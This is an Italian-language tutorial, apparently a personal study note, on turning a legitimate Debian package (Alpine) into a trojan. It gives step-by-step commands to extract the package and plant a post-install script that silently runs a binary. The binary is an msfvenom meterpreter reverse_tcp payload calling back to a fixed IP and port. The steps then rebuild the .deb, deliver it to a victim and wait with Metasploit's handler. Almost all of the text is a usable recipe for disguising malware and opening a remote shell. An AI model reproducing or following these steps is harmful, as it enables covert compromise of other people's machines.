tags: trojan Trojan_Metasploit Creazione_Trojan
Per creare un Trojan abbiamo bisogno di un programma legittimo al quale ci attaccheremo il nostro script malevolo.
Quindi per prima cosa scarichiamo un programma come per esempio Alpine:
sudo apt-get download alpineOra estrai il contenuto del file con il seguente comando:
engrampa <alpine.deb> -e <nome nuovo del file>In genere all’interno di questi programmi sono presenti 2 cartelle principali DEBIAN e usr e all’interno della cartella DEBIAN ci sono 3 tipi di file principali Control, md5sums e postint.
Sostiuiamo o creiamo nel caso non ci fosse il file postint e inseriamo il seguente contenuto:
#!/bin/bash
#postint script Alpine
sudo chmod 2755 /usr/bin/malicious &
sudo ./usr/bin/malicious &
exit 0chmod +x postintTramite lo script di sopra andiamo ad attivare lo script msfvenom che andremo ad inserire all’interno della cartella /usr/bin e verrà eseguito subito dopo l’attivazione del programma perchè è questo che fa il file postint.
cd /usr/bin
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.210 LPORT=8443 -b "\x00" -f elf -o malicious
chmod +x malicious # In realtà di questo comando non sono sicuro
Una volta creato dovrebbe apparire nel seguente modo:
Ora che abbiamo modificato il programma ed inserito il nostro payload possiamo ricostruire il file .deb con il seguente comando:
dpkg-deb --build <nome nuovo del file>Ora trasferiamo il file .deb alla vittima, lo installiamo tramite:
dpkg -i <nome del file>E lo avviamo tramite:
alpineOvviamente dovremo metterci in ascolto con Metasploit tramite il exploit/multi/handler